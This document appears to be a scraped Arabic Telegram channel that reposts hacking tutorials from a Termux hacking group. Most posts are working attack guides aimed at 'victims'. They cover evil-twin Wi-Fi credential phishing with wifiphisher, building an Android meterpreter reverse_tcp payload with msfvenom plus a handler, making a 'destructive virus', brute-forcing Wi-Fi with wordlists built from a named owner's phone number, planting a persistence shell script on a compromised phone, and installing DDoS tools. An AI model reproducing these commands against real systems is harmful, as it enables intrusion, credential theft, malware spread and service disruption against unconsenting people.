افضل برامج وادوات
3.28K subscribers
30 photos
1 video
36 files
280 links
برامج مفيده للهكرز والمبرمجين وغيرهم
Download Telegram
Forwarded from 🏴‍☠ termux محترفين الهكر والاختراقات (آلَجَنرآلَ صِـدُآمِـ آلَشّـرعَبّيـﮯ)
من لائحة شبكات الوايفاي المعرضة لك ستحدد AP المستهذف و ذلك بالضغط على " كنترول + حرف س من لوحة المفاتيح في نفس الوقت لوقف عملية البحث عن نقاط الوايفاي المتاحة و ادخل اسم " أب " المستهذف و اضغط عليه ،
Forwarded from 🏴‍☠ termux محترفين الهكر والاختراقات (آلَجَنرآلَ صِـدُآمِـ آلَشّـرعَبّيـﮯ)
وبعد اكتمال المهمة ، الأداة ستوجه الضحية الى الصفحة المستنسخة وطلب منه المصداقة على بيانات الاعتماد لتسجيل الدخول .
Forwarded from 🏴‍☠ termux محترفين الهكر والاختراقات (آلَجَنرآلَ صِـدُآمِـ آلَشّـرعَبّيـﮯ)
بعد الاتصال الى هذا " أب " المزيف الأداة ستعرض عليه صفحة ويب بروكسي 10.0.0.18 و طلب منه تحديث برنامجه الثابت و ذلك بإدخال اسم المستخدم و كلمة مرور الوايفاي .
Forwarded from 🏴‍☠ termux محترفين الهكر والاختراقات (آلَجَنرآلَ صِـدُآمِـ آلَشّـرعَبّيـﮯ)
هكذا يصلك كود الشبكة عبر نفس الأداة من دون ترك أثر الإختراق لدى الضحية .
رابط تحميل الادة
https://github.com/wifiphisher/wifiphisher/releases
المصدر
@termux_alsharabi
Forwarded from 🏴‍☠ termux محترفين الهكر والاختراقات (آلَجَنرآلَ صِـدُآمِـ آلَشّـرعَبّيـﮯ)
لسته باسوردات.rar
13.8 KB
اقوى لستة باسوردات تخمين للختراق
المصدر
@termux_alsharabi
Forwarded from 🏴‍☠ termux محترفين الهكر والاختراقات (آلَجَنرآلَ صِـدُآمِـ آلَشّـرعَبّيـﮯ)
اوامر الاختراق بالبايلود في أداة metasploit-framework بطريقتين

الطريقة الاولى موجودة في الدرس السادس في المدونة ابحث عنها:
الطريقة الثانية لعمل البايلود مع اوامر الاختراق أداة metasploit-framework :
اولا

اظهار ال ip في صفحه اخري

ifconfig

-----------------------------------------------------------------


ثانيا بعد تثبيت الاداه

cd metasploit-framework

ls

-----------------------------------------------------------------


ثالثا

عمل بايلود. بطريقة اخرى:

ruby msfvenom -p android/meterpreter/reverse_tcp LHOST=هنا الايبي LPORT=هنا البورت R > /sdcard/termux.apk


-----------------------------------------------------------------


رابعا

بعد عمل البايلود اطلب

$ ./msfconsole

$ use exploit/multi/handler

$ set payload android/meterpreter/reverse_tcp

$ set lhost

$set lport

$ run


$help

$cd /sdcard

$ls


ستظهر كافة ملفات الضحية في ذاكرة التخزين الداخلية وفي الدرس القادم سأترك لكم اوامر التجسس والتحكم ب جهاز الضحية وشكرا لكم للمتابعة.

المصدر
@termux_alsharabi
Forwarded from 🏴‍☠ termux محترفين الهكر والاختراقات (آﻹمِـٰٚـِْ✮ِـٰٚـِْبِـٰٚـِْ✮ِـٰٚـِْر آطِـٰٚـِْ✮ِـٰٚـِْﯛ̲ر)
السلام عليكم ورحمة الله وبركاته
▔▔▔▔▔▔▔▔▔▔▔▔▔
اليوم شرحنا طريقه صنع فيروس مدمر بأداة New virus نبدأ على بركه الله

اول شي رح احطلكم الاداه بصيغه zip وماعليك الى تنقلها للذاكره الداخليه مع الملفات

والان اكتب ذي الاوامر بالترتيب


$ apt update && apt upgrade -y

$ pkg install git python python2

$ cd /sdcard

$ ls

$ mv New-virus.zip $HOME

$ cd $HOME

$ ls

$ unzip New-virus.zip

$ ls

$ rm -rif New-virus.zip

$ ls

$ cd New-virus

$ ls

$ chmod +x creater.py

$ ls

$ pkg install git python python2 figlet

$ gem install lolcat

$ pip install mechanize

$ ls

$ python2 creater.py

بعدين بتطلع قائمة كلها فيروسات ماعليك الى تكتب رقمها وانتر

يستحسن كتابة رقم 7 وانتر

€الان خليه لما يخلص صناعة الفيروس وبعدين

$ ls

$ mv ......... /sdcard

رح تكتب بدل النقاط اسم البرنامج الي بيطلع لك

♪الان راح تروح الذاكره الداخليه بتحصل الفيروس خارج مع الملفات♪


★مقدم الشرح من

#الامبراطور

#اخمط بذكر المصدر
Forwarded from 🏴‍☠ termux محترفين الهكر والاختراقات (آلَجَنرآلَ صِـدُآمِـ آلَشّـرعَبّيـﮯ)
طريقة إزالة فيروسات الاندرويد من جذورها
الفيروساات:..
Monkey Test
Time Service
ikeyboard
adobe air
وبعض البرامج الاباحيه .
الحل الأول وهو اعاده تفليش الروم من جديد..
الحل الثاني عبر الجهاز ويتطلب وجود صلاحيات الروت في الجهاز
ثم تثبيت برنامج Root Explorer
وحذف الفيروسات من مسارها
system/app
system/priv-app
الحل الثالث عبر الكمبيوتر ويطلب صلاحيات الروت وتفعيل تصحيح الـ USB من خيارات المطور في الاعدادات ..
ويتم حذف الفيروسات عبر الأدوات التالية
Monkey Test & Time Service Virus Clean v1.4
MT & TS Killer
الأدوات والبرامج
https://drive.google.com/file/d/0B0BttwgQ2fJyZEhWZ1doRzRNcEU/view?usp=sharing
Forwarded from 🏴‍☠ termux محترفين الهكر والاختراقات (آﻹمِـٰٚـِْ✮ِـٰٚـِْبِـٰٚـِْ✮ِـٰٚـِْر آطِـٰٚـِْ✮ِـٰٚـِْﯛ̲ر)
بسم الله الرحمن الرحيم

#لاول-مره-في-التاريخ-التلجرامي 😂😂

اليوم شرحنا اختراق جميع الشبكات wps-wpa-wp2 بالتخمين

#الخطوه_الاولى

اول شي رح تحملو اداه goodlist لانشاء لستة الي رح نستخدمها في التخمين على الشبكه

¥ذا يعتمد عليكم على جمع معلومات الشبكه مثال صاحب الشبكه رقمه 772196830
اسمه عبدالرحمن

اسم الشبكه internet

واذا انت عارف معلومات اكثر حطها في الستة

تابعوا

رح تكتبوا ذي الاوامر بالترتيب علشان نسوي لسته تخمينات على معلوماته لكي نستخدمها بالاختراق

#رح احطلكم الاداه اسفل الشرح بصيغه zip رح تحطها خارج مع الملفات#

حط ذي الاوامر بالترتيب

$ apt update && apt upgrade

$ pkg install python python2 git nano unzip

$ termux-setup-storage

$ cd /sdcard

$ ls

$ mv goodlist.zip $HOME

$ cd $HOME

$ ls

$ unzip goodlist.zip

$ ls

$ rm -rif goodlist.zip

$ ls

$ chmod +x goodlist.py

$ ls

$ python goodlist.py

الان رح تحط اسم الاداه لاكن لاتنسى حطها بصيغه .txt مثال pass.txt وبعدها انتر

بعدين رح تحط المعلومات الي تعرفها عليه مثال رقم جواله 772196830

اسمه abdulrhman

اسم الشبكه internet

ورح تحط كل المعلومات عنه وحط بعد كل معلومه انتر لاكن لاتنقص على 6 معلومات
انتبه تحط المعلومات اقل من 8ارقام او حروف لانه الراتور بيجي اقل شي كلمه السر من 8 ارقام وحروف مثال 12345678 /hfogifjh

وبعد ماتخلص من كتابه كل المعلومات عليه اكتب كلمه exit

بعدها اكتب  ls رح تحصل الستة حق التخمين رح تنقلها للذاكره الداخليه بأمر

mv ...... /sdcard

اكتب بدل النقاط اسم الملف الي ساويته مثال mv pass.txt /sdcard

الان بينتقل للذاكره الداخليه هيك نكون قد خلصنا من الخطوه الاولى


▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔
#الخطوه_الثانيه

رح احط لكم برنامج تحتىالوصف

1- رح تدخل للبرنامج

2- بتحصل كلمة ADD NETOWRK
رح تدز عليها بتحصل الشبكه الي رح تخمن عليها دز عليها

3- بعدها رح تحصل كلمه ADD CUSTOM DICTIONARY
رح تدز عليها وتروح لل لستة التخمينات الي سويتها وتدز عليها وبعدين على كلمه موافق

4- بعدها رح تحصل خمسه خيارات داخل البرنامج بتعلم على لسته التخمينات الي سويتها فقط وبعدين رح تدز على كلمه ADD CUSTOM
والان رح يبدأ يخمن على لسته الباسوردات الي ساويتها

وشكرا

#الطريقه_لاتحتاج_روت

#انا_غير_مسؤل_عن_استخدام_الشرح_في_مظره_الاخرين

#مقدم_الشرح_من

@alambratwri

#تحياتي
المصدر
@termux_alsharabi
👍3
Forwarded from 🏴‍☠ termux محترفين الهكر والاختراقات (آﻹمِـٰٚـِْ✮ِـٰٚـِْبِـٰٚـِْ✮ِـٰٚـِْر آطِـٰٚـِْ✮ِـٰٚـِْﯛ̲ر)
Goodlist.zip
1.4 KB
Forwarded from 🏴‍☠ termux محترفين الهكر والاختراقات (آﻹمِـٰٚـِْ✮ِـٰٚـِْبِـٰٚـِْ✮ِـٰٚـِْر آطِـٰٚـِْ✮ِـٰٚـِْﯛ̲ر)
wibr-wifi-pro.apk
2.5 MB
Forwarded from 🏴‍☠ termux محترفين الهكر والاختراقات (آلَجَنرآلَ صِـدُآمِـ آلَشّـرعَبّيـﮯ)
AnDOSid-com.scott.herbert.AnDOSid-3-v1.1.apk
39.4 KB
برنامج ضرب الموقع وتجميدها
Forwarded from 🏴‍☠ termux محترفين الهكر والاختراقات (آﻹمِـٰٚـِْ✮ِـٰٚـِْبِـٰٚـِْ✮ِـٰٚـِْر آطِـٰٚـِْ✮ِـٰٚـِْﯛ̲ر)
▔▔▔▔▔
Harvester

Installation :

$ apt update && apt upgrade

$ apt install git 

$ apt install python2

$ apt install python

$ git clone https://github.com/laramies/theHarvester

$ cd theHarvester

$ chmod +x *

usage :

$ python2 theHarvester.py

▔▔▔▔▔▔▔▔▔▔▔▔▔
Heart-Bleed scanner

Installation :

$ apt update && apt upgrade

$ apt install git 

$ git clone https://github.com/TechnicalMujeeb/HeartBleed.git

$ cd HeartBleed 

$ chmod +x * 

$ ./install.sh 

=> usage :

$ ./hbleed

▔▔▔▔▔▔▔▔▔▔▔▔▔
smb-scanner

Installation :

$ apt update && apt upgrade

$ apt install git 

$ apt install python2

$ apt install python

$ git clone https://github.com/TechnicalMujeeb/smb-scanner

$ cd smb-scanner

cd modules

$ chmod +x *

$ cd ..

$ chmod +x *

$ ./install.sh

usage :

$ ./smbscan

▔▔▔▔▔▔▔▔▔▔▔▔▔
Password-Generator

Installation :

$ apt update && apt upgrade

$ apt install git 

$ apt install python

$ git clone https://github.com/TechnicalMujeeb/PassGen

$ PassGen

$ chmod +x *

usage :

$ python passgen.py

▔▔▔▔▔▔▔▔▔▔▔▔▔
sql map

Installation :

$ apt update && apt upgrade

$ apt install git 

$ apt install python2

$ apt install python

$ git clone https://github.com/sqlmapproject/sqlmap

$ cd sqlmap

$ chmod +x *

Run :

$ python2 sqlmap.py -h

▔▔▔▔▔▔▔▔▔▔▔▔▔
santet-online

Installation :

$ apt update && apt upgrade

$ apt install git 

$ apt install python2

$ apt install python

$ pip2 install requests

$ git clone https://github.com/Gameye98/santet-online

$ santet-online

$ chmod +x *

usage :

$ python2 santet.py

▔▔▔▔▔▔▔▔▔▔▔▔▔
Autopixie-WPS

Installation :

$ apt update && apt upgrade

$ apt install git 

$ apt install python2

$ apt install python

$ pip2 install requests

$ git clone https://github.com/nxxxu/AutoPixieWps

$ cd AutoPixieWps

$ chmod +x *

Run :

$ python2 autopixie.py

▔▔▔▔▔▔▔▔▔▔▔▔▔
viSQL scanner

Installation :

$ apt update && apt upgrade

$ apt install git 

$ apt install python2

$ apt install python

$ pip2 install requests

$ git clone https://github.com/blackvkng/viSQL.git

$ cd viSQL

$ pip2 install -r requirements.txt

Run :

$ python2 viSQL.py --help

▔▔▔▔▔▔▔▔▔▔▔▔▔
Hakku-Framework

Installation :

$ apt update && apt upgrade

$ apt install python

$ git clone https://github.com/4shadoww/hakkuframework

$ cd hakkuframework

$ chmod +x *

Usage :

$ python hakku

▔▔▔▔▔▔▔▔▔▔▔▔▔
Angry Fuzzer

Installation :

$ apt update && apt upgrade

$ apt install git 

$ apt install python2

$ apt install python

$ git clone https://github.com/ihebski/angryFuzzer 

$ cd angryFuzzer 

$ pip2 install -r requirements.txt

$ pip2 install requests

$ chmod +x *

Usage :

$ python2 angryFuzzer.py -h

▔▔▔▔▔▔▔▔▔▔▔▔▔
IPGeoLocation-Trace ip

Installation :

$ apt update && apt upgrade

$ apt install git 

$ apt install python

$ git clone https://github.com/maldevel/IPGeoLocation

$ cd IPGeoLocation

$ chmod +x *

$ pip install -r requirements.txt

Usage :

$ python ipgeolocation.py -t [target ip]

▔▔▔▔▔▔▔▔▔▔▔▔▔
Infoga-collect email-information

Installation :

$ apt update && apt upgrade

$ apt install git 

$ apt install python2

$ git clone https://github.com/m4ll0k/Infoga

$ cd Infoga

$ chmod +x *

$ pip2 install requests

usage : 

$ python2 infoga.py

▔▔▔▔▔▔▔▔▔▔▔▔▔
Hulk

Installation :

$ apt update && apt upgrade

$ apt install git 

$ apt install python2

$ git clone https://github.com/grafov/hulk

$ cd hulk

$ chmod +x *

usage :

$ python2 hulk.py

▔▔▔▔▔▔▔▔▔▔▔▔▔
Golden Eye

Installation :

$ apt update && apt upgrade

$ apt install git 

$ apt install python2

$ git clone https://github.com/jseidl/GoldenEye

$ cd GoldenEye

$ chmod +x *

Run :

$ python2 goldeneye.py [url]

▔▔▔▔▔▔▔▔▔▔▔▔▔
Brutal

Installation :

$ apt update && apt upgrade

$ apt install git 

$ git clone h
👍1
Forwarded from 🏴‍☠ termux محترفين الهكر والاختراقات (آلَجَنرآلَ صِـدُآمِـ آلَشّـرعَبّيـﮯ)
مشاهدة "اختراق الفيسبوك باداه set في توزيعه الكالي لينكس 2018من صدام الشرعبي" على YouTube
https://youtu.be/E6Pz-ZY25Xc
Forwarded from 🏴‍☠ termux محترفين الهكر والاختراقات (آلَجَنرآلَ صِـدُآمِـ آلَشّـرعَبّيـﮯ)
طريقة تثبيت ملفات الضحية بعد الأختراق
الشرح مقدم م̷ـــِْن صدام الشرعبي
أولا قبل الأختراق نكتب الاوامر:

apt update


apt upgrade


termux-setup-storage


ls


cd Tmux-Bunch


ls


git reset --hard


git pull


chmod +x setup


./setup


tmuxbunch


7


cd shell


mv shell.sh /sdcard


بعد فتح اداه MetaSploit واختراق الضحيه



cd /sdcard


upload /sdcard/shell.sh /sdcard


shell


cd /sdcard


ls


sh shell.sh


بعد هذا انتظر حتي ياتي معك رساله

بهذا انت الان تقدر تفتح جهاذ الضحيه في اي وقت
اخمط_بذكر_المصدر
@termux_alsharabi
Forwarded from 🏴‍☠ termux محترفين الهكر والاختراقات (آلَجَنرآلَ صِـدُآمِـ آلَشّـرعَبّيـﮯ)
السلام عليكم ورحمة الله وبركاته
المتاسبلوت هو مشروع كبير تم إنشاءه سنة 2013 وهو عبارة عن مكتبة من الأدوات ، وقواعد بيانات لمجموعة من الثغرات التي يتم اكتشافها ، ومعروف أنه بعد هذه المدة الطويلة وبعد كل إصدار جديد يتم إضافة أدوات و ثغرات جديدة إليه ، وهو بالمناسبة مبرمج بلغة Ruby.

هناك وظائف كثيرة يمكنك استغلال من خلاله هذه الأداة ، فهناك من يعتقد أن الأشخاص الذين يتوجهون إليه يكون السبب الرئيسي التهكير واستغلاله لهذه الأغراض السيئة ، في الوقت الذي نجد مجموعة كبيرة لمن يصنفون في ال white hat يستغلون هذه البرنامج لحماية أنفسهم عبر معرفة أحدث الثغرات والأدوات الموجودة وسبل الحماية منها،


ما هي خطورة المتاسبلوت؟
الميتاسبلواد يستطيع عبره الهاكر التحكم بجهازك كاملا بدون ما تستشعر بذلك وهنا تكمن الخطورة ، حيث مع هذا البرنامج أصبح عهد البيفر وست والترجينات ليست لها قيمة ، إلا مع فئة قليل من الهاكر المبتدؤون الذين لا يزالون يستعملون هذه الطرق القديمة، ويمكن أيضا عبر الميتاسبلواد اختراق الشبكات والسيرفيرات بالأدوات والثغرات التي يتوفر عليها.

ما هي أشهر الأدوات المتاسبلوت ؟
من بين أشهر أدوات الميتاسبلواد نجد مثلا nmap project ، فهي تعمل على فحص الشبكات والأنظمة والسيرفيرات حيث تقوم بجمع المعلومات عنها ، ويمكن اختراقها بشكل أوتوماتيكي باستخدام أداة خطيرة موجودة ضمن المشروع تدعى db_autopwn ، نجد أيضا أداة buffer overflow التي يتم من خلالها استغلال الثغرات المكتشفة ،وأدوات أخرى مهمة وتكتسي خطورة كبيرة جدا..

من بين المميزات الأخرى للمتاسبلوت أنه لايترك أي أثار على الاختراق كونه يقوم بشحن مكتبات dll في ذاكرة النظام مباشرة مستغلا في ذلك الثغرات الموجودة في البرنامج المصابة. ويمكن تشغيله على الوندوز ، رغم أن بيئة اللنكس هي الأنسب حيث يشتغل بسرعةوتجاوب معها أكثر
----------------------------
الخلاصة:
مشروع الميتاسبلوت و استخدامه السهل قد يجعلت الكثيرين من يظنون الهاكر الغيلر أخلاقيين بما فيهم أطفال الهاكر في اختراق أجهزة الآخرين و التحكم بها ، وذلك بتنفيذ بضعة أوامر دون أي معرفة أو فهم بالثغرة ، أحيانا يكون سببها برمجتها ، أو سهولة استغلالها ، كما قد يكون صعب استخدامه خصوصاعلى المبتدئين لصعوبة فهم الأوامر البرمجية مع مراعات إتقان اللغة الانجليزية حتى يتم فهم الثغرات بشكل جيد واستغلالها.
الشرح مقدم م̷ـــِْن صدام الشرعبي
@sadam_alsharabi
المصدر @termux_alsharabi
Forwarded from 🏴‍☠ termux محترفين الهكر والاختراقات (آلَجَنرآلَ صِـدُآمِـ آلَشّـرعَبّيـﮯ)
السلام عليكم ورحمة الله وبركاته
شرح جميع أوامر الميتا سبلويت

اليوم شرح جميل جداا للمبتدئين وهو عبارة عن مجموعة كبيرة من أوامر
MetaSploit

أترككم مع الأوامر
كود PHP:
show exploits
اظهار جميع ثغرات اداة الميتاسبلويت

كود PHP:
show payloads
اظهار جميع البايلود في مشروع الميتاسبلويت

كود PHP:
show auxiliary
يستخدم لاظهار ثغرات الفحص كـ فحص منافذ وبورتات مواقع و اجهزة ألخ

كود PHP:
show options
يستخدم لأظهار خيارات الثغرة المستخدمة

كود PHP:
use
يستخدم هذا الامر لأستخدام ثغرة ما كمثال .. use unix/***app/php_vbulletin_template

كود PHP:
set
يستخدم هذا الامر لتعديل خيارات ثغرة ما... انظر فوق ^_^ قلنا show options لأظهار خيارات الثغرة اما هنا لتعديل خيارات ثغرة ما او بالاصح ادخال الخيارات الى الثغرة من اي بي وبورت الى ما لذلك


مثال عليها .. من خيارات او شروط الثغرة ان تضع الاي بي المستهدف من موقع او جهاز وان تضع البروت ... يوجد غير هذان الخياران لكن هذا ليس موضوعنا وانما كيف التعديل على خيارات ثغرة ما ... الامر يكون هكذا
البورت المستهدف يرمز بهذا RPORT
بورت جهازنا لوصول التبليغ او اقصد بنجاح الثغرة والتحكم من جهازنا يرمز له LPORT
الاختلاف في كلمة L وكلمة R
عندما تشاهد هذه الرموز فوق تبدأ بـ L فأعلم انها تتكلم عنك واما اذا بدأت بـR فانها تتلكم عن الضحية
الامر يكون بالتعديل على خيارات الثغرة بهذا الامر
set RPORT 9999
هكذا بنكون عدلنا على الثغرة ووضعنا اي بي الهدف اما اذا قلنا كذا
set LHOST 129.168.1.100
كذا بنكون ادخلنا اي بي جهازنا في خيارات الثغرة لكي نتنصت عليه من النت كات او غيره
الان الاوامر جاهزة كذا

الآن لنفرض تريد اختيار بايلود معينة والنفرض بايلود الميتربريتر القوية .. ان شاء الله بنتطرق للبايلود وشرحها ووظيفتها واستعمالاتها

الان نرجع لموضوعنا ..يكون الامر هكذااا
set PAYLOAD windows/meterpreter/reverce_tcp


وبأمكانك تغيير البايلود التي واسمائها موجودة عن طريق الامر السابق
كود PHP:
show payloads
كود PHP:
show encoders
لأظهار ثغرات التشفير .. ليس هكس وانما تشفيرات من نوع قوي وفعال وايضا عن صنع اي بايلود فأنه يتم صناعته مشفر ولذلك ايضا يوجد هذه الانواع
encoders للتشفير اكثر واكثر
الشرح مقدم م̷ـــِْن صدام الشرعبي
@sadam_alsharabi
المصدر
@termux_alsharabi
Forwarded from 🏴‍☠ termux محترفين الهكر والاختراقات (آلَجَنرآلَ صِـدُآمِـ آلَشّـرعَبّيـﮯ)
استخدام Metasploit عن طريق Msfconsole

مقدمة
يتعبر Msfconsole هو الاشهر والاكثر استخدام في MSF. وهو يسمح با الوصل الوهمي الى كافة الخيارات المتوفرة في MSF. وعند استخدامك Msfconsole في البداية سوف تجد صعبوه في التعامل، لكن مع تعلم (syntax)تنفيذ الاومر سوف تقدر قوة هذة الواجهه.

فوائد msfconsole :
يدعم طريق الوصول الى معظم الخصائص المتوفرة في MSF.
يعتبر اكثر والواجهات استقراراً في الاستخدام.
يدعم التكملة التلقائية لتنفيذ الاوامر.
أمكانية تنفيذ يعض الاوامر الاضافية مثل (ping… وغيرها).
تشغيل (msfconsole):
بمكانك تشغيل msfconsole بكل سهوله بختيارة من القائمه في الباك تراك او بتنفيذ الامر في shell “./msfconsole” وبامكانك تمرير متغير “-h” لمشاهدة متغيرات خيارات الاستخدام.



المساعدة help:
قم بادخال الامر “help ” او “؟” وسوف تقوم بعرض العديد من الاوامر با الاضافة الى وصف لما تستخدم هذه الاوامر.

التكملة التلقائية :
صمم msfconsole ليكون سريع في الاستخدام واحد الخصائص التي تساعد في هذا الغرض هي التكلمة التلقائية(tab completion). مع وجود العديد من موديلز(modules)، يصعب عليك تذكراسم او مسار المديول(module) الذي تريد استخدامه.
وكما هو العادة في العديد من shells تقوم با الضغط على “tab” والذي سوف يقوم بعرض العديد من الخيارات او سوف يكمل تلقائياً اذا كان خيار واحد فقط .

use exploit/windows/dce
use .*netapi.*
set LHOST
set TARGET
set PAYLOAD windows/shell/
exp
show

أمر العودة الى الخلف (back):
عندما تنتهي من العمل مع موديل (module) معين او انك قد اخترت موديل(module) بالخطاء، في هذه الحالة تريد العودية الى الحالة السابقة لك، قم بادخال الامر “back” لكي تعودي الى ماقبل اختيارك.
msf auxiliary(ms09_001_write) > back
msf >



أمر الفحص (check) :
يقوم بفحص نظام الهدف هل هو مصاب با الاستغلال ام لا، قبل تنفيذ الاستغلال. وهذا الامر لايدعم العديد من الاستغلالات.
msf exploit(ms04_045_wins) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.114 yes The target address
RPORT 42 yes The target port
Exploit target:
Id Name
-- ----
0 Windows 2000 English
msf exploit(ms04_045_wins) > check
[-] Check failed: The connection was refused by the remote host
(192.168.1.114:42)



أمر الاتصال (connect):
هذا الامر يقوم بعمل شبية بعمل netcat وهو مبني ضمن msfconsole ويدعم SSL، proxies ،pivoting و ارسال الملفات. بتنفيذ الامر “connect” مع ايبي ادرس (IP Address ) و منفذ(Port)، وبمكانك الاتصال با الجهاز البعيد من خلال msfconsole مثل ماهو netcat او telnet.
msf > connect 192.168.1.1 23
[*] Connected to 192.168.1.1:23
DD-WRT v24 std (c) 2008 NewMedia-NET GmbH
Release: 07/27/08 (SVN revision: 10011)

DD-WRT login:

وبتمرير المتغير “-s” في الاتصال سوف يكون الاتصال عبر SSL.
msf > connect -s www.metasploit.com 443
[*] Connected to www.metasploit.com:443
GET / HTTP/1.0
HTTP/1.1 302 Found
Date: Sat, 25 Jul 2009 05:03:42 GMT
Server: Apache/2.2.11
Location: http://www.metasploit.org/



أمر ((exploit مقابل (run) :
عندما يتم تنفيذ اي إستغلال يكون بتنفيذ امر “exploit”، بينما عندما تستخدم auxiliary module يكون الانسب بتنفيذها من خلال الامر “run”. وايضا يمكنك استخدام امر “exploit”.
msf auxiliary(ms09_001_write) > run
Attempting to crash the remote host...
datalenlow=65535 dataoffset=65535 fillersize=72
rescue
datalenlow=55535 dataoffset=65535 fillersize=72
rescue
datalenlow=45535 dataoffset=65535 fillersize=72
rescue
datalenlow=35535 dataoffset=65535 fillersize=72
rescue
...بقية النتائج...



أمر (irb) :
بتنفيذ هذا الامر تقوم با الدخول على سكربت لغة الروبي وتستطيع تنفيذ اوامر الروبي مباشرة من msfconsole، وهذه الميزة مفيدة جداً حيث تساعدك على فهم Framework.
msf > irb
[*] Starting IRB shell...
>> puts "Hello, Fayez!"
Hello, Fayez!
>> Framework::Version
=> "3.7.0-release"

أمر (jobs) :
يقوم بعرض وإدارة المديول(modules) التي تشتغل في الخلفية(Background). وبتنفيذ امر “jobs” يكون بمكانك عرض وإنها
هذه الاعمل(jobs).

msf exploit(ms08_067_netapi) > jobs -h
Usage: jobs [options]

Active job manipulation and interaction.

OPTIONS:

.-K Terminate all running jobs
. -h Help banner
-i Lists detailed information about a running job.
-k Terminate the specified job name.
-l List all running jobs.
-v Print more detailed info. Use with -i and –l.



أمر (load/unload):
بتنفيذ أمر لود “load” متبوع بـاسم إضافة(plugin)
Forwarded from 🏴‍☠ termux محترفين الهكر والاختراقات (آلَجَنرآلَ صِـدُآمِـ آلَشّـرعَبّيـﮯ)
من الاضافات التي تكون متواجدة ضمن مجلد (plugin) في metasploit. وتمرر المتغيرات با الشكل التالي ” key=val” داخل وامر الشل.
msf > load
Usage: load [var=val var=val ...]
Load a plugin from the supplied path. The optional
var=val options are custom parameters that can be
passed to plugins.
msf >; load pcap_log
[*] Successfully loaded plugin: pcap_log

بلمقابل، امر “unload” يقوم بازالة ماتم تحميلة في الامر السابق.
msf >; unload pcap_log
Unloading plugin pcap_log...unloaded.



أمر (loadpath) :
أذا كان لديك بعض payloads، encoders او استغلال لثغرة يوم الصفر بمكانك تحديد المسار للمديول(module) الخاص بك. حيث ان هذا الامر يستخدم لإضافة مسار لموديلز(modules) طرف ثالث.
msf >; loadpath /home/secret/modules
Loaded 0 modules.



أمر (resource) :
بعض انواع الهجوم مثل Karmetasploit تستخدم لتنفيذ عدد من الاوامر المرتبة بشكل متسلسل داخل ملف دفعي(batch file) يتم تنفيذه من خلال msfconsole بتنفيذ امر “resource” متبوع باسم الملف.
msf > resource karma.rc
resource> load db_sqlite3
[-]
[-] The functionality previously provided by this plugin has been
[-] integrated into the core command set. Use the new 'db_driver'
[-] command to use a database driver other than sqlite3 (which
[-] is now the default). All of the old commands are the same.
[-]
[-] Failed to load plugin from
/pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 10.0.0.1
AUTOPWN_HOST => 10.0.0.1
…باقي النتائج…

وهذه الملفات الدفعية(batch files) تساعد في تسريع الاختبار(testing) والتطوير(development) ، با الاضافة الى انه يسمح للمستخدم بتنفيذ العديد من المهام بشكل اتوماتيكي او اّلي، وباستطاعتك تنفيذ الملف في عملية بداء التشغيل msfconsole بتمرير متغير ‘-r’. وفي المثالي التالي سوف نقوم بنشاء ملف يظهر اصدار metasploit في بداء التشغيل



أمر (route) :
يسمح هذا الامر بإعادة توجية السوكيت(sockets) من خلال session او comm. ولكي يضيف امر إعادة التوجية تقوم بتمرير السب نت (subnet) وقناع الشبكة (network mask) متبوع برقم session او comm. لاحظ المثال التالي.
msf exploit(ms08_067_netapi) > route
Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]
Route traffic destined to a given subnet through a supplied session.
The default comm is Local.
msf exploit(ms08_067_netapi) > route add 192.168.1.0 255.255.255.0 3
msf exploit(ms08_067_netapi) > route print
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.1.0 255.255.255.0 Session 3



أمر (info) :
سوف يقوم بتزويدك بمعلومات تفصيلية عن موديل(module) معين ويقوم بعرض كافة الخيارات و الاهداف المصابة ومعلومات اخرئ.
و امر ‘info’ سوف يقوم بتزويدك با المعلومات التالية :
معلومات عن الكاتب و الرخصة.
مراجع الثغرة مثل (CVE,BID.. الخ).
اي من payload التي تشتغل فقط مع هذا Module.
msf > info dos/windows/smb/ms09_001_write
Name: Microsoft SRV.SYS WriteAndX Invalid DataOffset
Version: 6890
License: Metasploit Framework License (BSD)
Provided by:
j.v.vallejo

أمر (set/unset) :
يسمح للمستخدم بضبط إعدادات وخيارات بيئة العمل و المتغيرات للمويل(module) الذي تعمل علية.
msf auxiliary(ms09_001_write) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf auxiliary(ms09_001_write) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.1 yes The target address
RPORT 445 yes Set the SMB service port
في الايام الاخير تم اضافة ميزة جديدة في بيئة عمل metasploit و هي أستخدام مشفرات(encoders) وقت التشغيل (run time) وهذه تكون مفيدة في تطوير الاستغلال عندما لا تكون متاكد اي نوع من الباي لود(payloads) سوف يشتغل مع الاستغلال.
msf exploit(ms08_067_netapi) > show encoders
Compatible encoders
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/generic_sh good Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/printf_php_mq good printf(1) via PHP magic_quotes Utility Command Encoder
generic/none normal The "none"
👍1
Forwarded from 🏴‍☠ termux محترفين الهكر والاختراقات (آلَجَنرآلَ صِـدُآمِـ آلَشّـرعَبّيـﮯ)
Encoder
mipsbe/longxor normal XOR Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
